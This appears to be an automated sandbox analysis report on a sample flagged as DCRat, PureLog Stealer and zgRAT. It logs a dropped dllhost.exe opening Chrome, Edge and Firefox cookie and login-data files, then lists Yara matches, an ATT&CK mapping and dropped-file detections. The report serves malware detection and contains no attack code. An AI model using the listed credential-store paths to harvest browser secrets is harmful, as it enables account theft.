Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.4103094451.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4103094451.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4103094451.000000000342D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1689492935.0000000012ED7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eu6OEBpBCI.exe PID: 5928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dllhost.exe PID: 6924, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: eu6OEBpBCI.exe, type: SAMPLE
Source: Yara match	File source: 0.0.eu6OEBpBCI.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1642613306.00000000004E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\Public\Libraries\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\fontdrvhost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: eu6OEBpBCI.exe, type: SAMPLE
Source: Yara match	File source: 0.0.eu6OEBpBCI.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\Public\Libraries\dllhost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\fontdrvhost.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	141 Windows Management Instrumentation	1 Scripting	112 Process Injection	33 Masquerading	1 OS Credential Dumping	331 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	251 Virtualization/Sandbox Evasion	Security Account Manager	251 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Clipboard Data	11 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	112 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	134 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
eu6OEBpBCI.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
eu6OEBpBCI.exe	100%	Avira	HEUR/AGEN.1323342
eu6OEBpBCI.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Desktop\RGKyyyvv.log	100%	Avira	HEUR/AGEN.1300079
C:\Users\user\Desktop\FnLRHIfV.log	100%	Avira	HEUR/AGEN.1362695
C:\Users\Public\Libraries\dllhost.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe	100%	Avira	HEUR/AGEN.1323342
C:\Recovery\fontdrvhost.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\VE9VyBa20L.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\GzproQCn.log	100%	Avira	TR/Agent.jbwuj
